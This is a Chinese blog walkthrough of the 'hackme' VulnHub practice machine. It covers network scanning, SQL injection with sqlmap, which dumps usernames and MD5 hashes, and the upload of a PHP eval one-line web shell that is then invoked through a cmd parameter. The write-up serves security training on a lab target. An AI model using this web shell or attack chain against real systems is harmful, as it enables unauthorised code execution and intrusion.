靶机渗透 hackme

已于 2024-07-29 20:52:14 修改
阅读量215 收藏 3
点赞数 6
分类专栏: 靶机 文章标签: centos
于 2024-07-29 20:16:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_66105152/article/details/140779982
版权
1.获取ip

使用 kali 自带的 netdiscover, 扫描本网段除 kali 的 ip 之外存活的 ip 就是 靶机的 ip

netdiscover -i eth0 -r 192.168.187.0/24	//root执行

2.端口扫描
nmap -T4 -sV -O -p22,80 x.x.x.x

识别出开放两个端口22,80

3.扫描目录
dirsearch -u x.x.x.x

4.访问/register.php

5.创建用户

密码为123456的用户admin并登录

6.sqlmap跑

user1

user2

user3

test

superadmin

test1

admin

5d41402abc4b2a76b9719d911017c592

6269c4f71a55b24bad0f0267d9be5508

0f359740bd1cda994f8b55330c86d845

05a671c66aefea124cc08b76ea6d30bb

2386acb2cf356944177746fc92523983

05a671c66aefea124cc08b76ea6d30bb

e10adc3949ba59abbe56e057f20f883e

7.登录superadmin

8.上传一句话木马文件
<?php @eval($_GET[cmd]);?>

9.访问/uplads/

uploads/1.php?cmd=phpinfo();

╰落叶梧桐细数悲伤゛
关注
专栏目录
靶机渗透 HACKME-2 (详细渗透,适合新手渗透
君莫hacker的博客
09-06 4117
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 6747
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
靶机渗透hackme详解(有手就行!)
2301_76631050的博客
07-29 295
虚拟机为NAT模式,根据真实机NAT模式的IP,我们进行端口扫描,扫描出虚拟机的IP为192.168.222.131。可以看到superadmin为超级管理员的意思,但是密码进行了md5加密,我们需要对密码解密,然后登录超级管理员界面。我们并不知道我们的文件被上传到了哪里,所以这里还得需要工具扫描一下他的目录。我们判断可能存在SQL注入,输入 ‘or 1=1# ,发现页面正常。我们上传一个带有一句话木马的文件,看看怎么个事。接下来我们随便输入一下进行抓包,利用sqlmap跑一下看看。
hackme-1靶机渗透详解
大熊
06-12 596
hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。 此靶机重点在于SQL注入,爆出管理员用户及密码。
Hackme靶机渗透
m0_50584370的博客
06-01 270
hackme靶机渗透
靶机渗透hackme1
weixin_64267091的博客
01-04 922
对于vulnhub中的靶机,我们都需先下载镜像,然后导入VM,并将改为NAT模式。首先我们再来看一下靶机渗透的步骤:信息收集-漏洞分析-漏洞利用-提权。基本都是这个三个步骤,接下来开始我们今天的靶机渗透吧!
Hackme2靶机总结
qq_45301512的博客
12-17 403
(2) 先用最普通的测post的跑一下,发现不行,根据最后的提示,可以加上 –level 参数 和 –tramper=space2comment 参数。看了网上的答案,发现/home/legacy下存在一个touchmenot可执行文件,运行就能提权。使用msfvenom生成一个php的tiquan.php,上传到/var/www/html目录下。=eval 代替
漏洞payload 靶机_hackme:2 靶机攻略
weixin_42354108的博客
01-16 1088
原标题:hackme:2 靶机攻略 0x01 背景:hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中、内容丰富,贴近实战。而且没有太多的脑洞,适合安全工作者们用来练习渗透测试,然而唯一的缺憾是目前没有公开的攻略,因此把个人的通关过程记录于此,作为攻略分享给大家!0x02 技术关键词:SQL注入、WAF Bypass、模糊测试、文件上传、suid提权0x03 靶机发现与...
靶机渗透HACKME: 1
weixin_47443077的博客
06-20 297
靶机渗透HACKME: 1 本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1 文章目录【靶机渗透HACKME: 10x01靶机介绍1. 详情2. 描述0x02环境搭建1. 下载靶机2. 创建靶机3. 开启靶机0x03靶机渗透1. 主机发现2. 端口扫描3. 服务扫描4. web信息收集0x04漏洞利用1.SQL注入2.文件上传3.反弹shell4.提权 0x01靶机介绍 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1
靶机渗透SickOs1.2(非常详细,适合新手渗透
君莫hacker的博客
09-08 7226
靶机HACKME:2的目录0x01靶机描述 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/sickos-12,144/ 作者 D4rk 发布日期 2016年4月27日 难度 中等 靶机基本介绍: 这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限。 ...
Centos怎么执行脚本
qq_41941900的博客
09-27 403
方法一:切换到shell脚本所在的目录(此时,称为工作目录)执行shell脚本。方法三:直接使用bash 或sh 来执行bash shell脚本。方法四:在当前的shell环境中执行bash shell脚本。怎么执行脚本的详细内容,更多请关注CSDN其它相关文章!方法二:以绝对路径的方式去执行bash shell脚本。/" target="_blank">centos教程。
螺蛳壳里做道场:老破机搭建的私人数据中心---Centos下Docker学习06(Docker网络连接)
最新发布
wusam的专栏
10-03 1077
Docker在安装后自动提供3种网络,可以使用命令查看Docker使用Linux桥接,在宿主机虚拟一个Docker容器网桥(docker0)Docker启动一个容器时会根据Docker网桥的网段分配给容器一个IP地址,称为,同时Docker网桥是每个容器的默认网关。因为在同一宿主机内的容器都接入同一个网桥,这样容器之间就能够通过容器的直接通信。docker的4种网络模式网络模式配置说明host容器和宿主机共享container容器和另外一个容器共享。
CentOS 系统中的文件挂载 U 盘
北京土豆(qqxinxi) 的专栏
09-27 431
【代码】CentOS 系统中的文件挂载 U 盘。
螺蛳壳里做道场:老破机搭建的私人数据中心---Centos下docker学习02(yum源切换及docker安装配置)
wusam的专栏
10-01 1305
最近两个月CentOS、Docker、VMware EXSi以及和NAS相关的黑手对PRC国民极其不友好,我准备教完这一届的学生,全部换用国产自主知识产权的OpenEuler、OpenGauss、iSulad及PVE了,让老外自己去玩,爷仔细深耕国产产品。然后再确认/etc/yum.repos.d/不会有其他库文件,只留下Centos-7.repo,如果有全部删除。删除/etc/yum.repos.d/原有repo文件,将Centos-7.repo库文件拷贝到该目录下。获得自己的加速码,用支付宝登陆。
螺蛳壳里做道场:老破机搭建的私人数据中心---Centos下Docker学习03(网络及IP规划)
wusam的专栏
10-01 1214
规划各个服务器的IP地址及IP,如表3-2所示。Docker macvlan名称。表3-1 容器连接网络规划。表3-2 生成容器规划。容器连接网络初步规划。
螺蛳壳里做道场:老破机搭建的私人数据中心---Centos下Docker学习04(环境准备)
wusam的专栏
10-01 1027
会报错(bug),不理它,退出并重新进入。创建下面各容器(暂时用最简单的方法)4.2 按照表3-2规划创建容器。
centos环境安装JDK详细教程
weixin_44462773的博客
09-30 977
CentOS下JDK的详细安装过程说明,包括zip、rpm、yum三种不同的方式
hackbox靶机渗透
10-15
好的,关于hackbox靶机渗透,我可以提供一些基本的信息和建议。首先,hackbox是一个虚拟机靶机,可以用于练习渗透测试技能。在渗透测试过程中,需要进行信息收集、漏洞扫描、漏洞利用等步骤。以下是一些可能有用的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值